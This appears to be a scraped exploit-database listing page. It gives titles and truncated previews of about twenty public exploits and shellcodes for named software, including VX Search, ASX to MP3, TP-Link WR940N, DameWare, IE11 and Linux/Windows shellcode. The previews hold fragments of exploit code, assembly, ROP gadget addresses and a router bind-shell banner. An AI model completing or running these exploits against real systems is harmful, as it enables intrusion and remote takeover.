VX Search 10.2.14 - Proxy Local Buffer Overflow (SEH)

VX Search 10.2.14 - Proxy Local Buffer Overflow SEH !/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version :...

Dup Scout Enterprise 10.0.18 Buffer Overflow

Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser parser.addargument'--host', required=True args =...

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...

Jnes 1.0.2 - Stack Buffer Overflow

Jnes 1.0.2 - Stack Buffer Overflow !/usr/bin/env python coding: utf-8 Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow Date: 3-11-2017 Exploit Author: crashmanucoot Contact: twitter.com/crashmanucoot Vendor Homepage: http://www.jabosoft.com/home Software Link:...

ASLRay - Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying

Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying. Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - will work on any x86-64 Debian-based OS BASH - the whole script Limitations: Stack needs to be executable -z execstack Binary has...

DameWare Remote Controller 12.0.0.520 Remote Code Execution

Exploit Title: Dameware Remote Controller RCE Date: 3-04-2016 Exploit Author: Securifera Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx Version: 12.0.0.520 Website:...

TP-Link WR940N - Authenticated Remote Code Exploit Exploit

Exploit for hardware platform in category web applications import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can...

TP-Link WR940N - (Authenticated) Remote Code

TP-Link WR940N - Authenticated Remote Code import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...

Windows/x64 - API Hooking Shellcode (117 bytes)

/ Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : email protected Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks DeteleFileW API Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to...

Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)

.class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table border-spacing: 0px; var ntdllBase = ""; function infoleak var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe;...

Windows x64 - API Hooking Shellcode (117 bytes)

Windows x64 - API Hooking Shellcode 117 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : [email protected] Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks...

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)

/ Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux ----------------- Assembly code ------------------- global start section .text start: xor eax, eax push eax m...

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)

Linux/x86 - execve/bin/sh Polymorphic Shellcode 30 bytes. Shellcode exploit for Linx86 platform / Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux...

ASX To MP3 3.1.3.7 Buffer Overflow

Exploit Title: Buffer Overflow via crafted malicious .m3u file Exploit Author: Parichay Rai Tested on: XP Service Pack 3 CVE : CVE-2017-15221 Description ------------ A buffer overflow Attack possible due to improper input mechanism Proof of Concept ---------------- !/usr/bin/python This exploit...

VX Search Enterprise 10.1.12 Buffer Overflow

!/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link : http://www.vxsearch.com/setups/vxsearchentsetupv10.1.12.exe Version :...

ASX to MP3 3.1.3.7 - .m3u Local Buffer Overflow

ASX to MP3 3.1.3.7 - .m3u Local Buffer Overflow Exploit Title: Buffer Overflow via crafted malicious .m3u file Exploit Author: Parichay Rai Tested on: XP Service Pack 3 CVE : CVE-2017-15221 Description ------------ A buffer overflow Attack possible due to improper input mechanism Proof of Concept...

ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow

Exploit Title: Buffer Overflow via crafted malicious .m3u file Exploit Author: Parichay Rai Tested on: XP Service Pack 3 CVE : CVE-2017-15221 Description ------------ A buffer overflow Attack possible due to improper input mechanism Proof of Concept ---------------- !/usr/bin/python This exploit...

VX Search Enterprise 10.1.12 - Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link :...

ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass) Exploit

Exploit for windows platform in category local exploits import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN...

VX Search Enterprise 10.1.12 - Remote Buffer Overflow

VX Search Enterprise 10.1.12 - Remote Buffer Overflow !/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link :...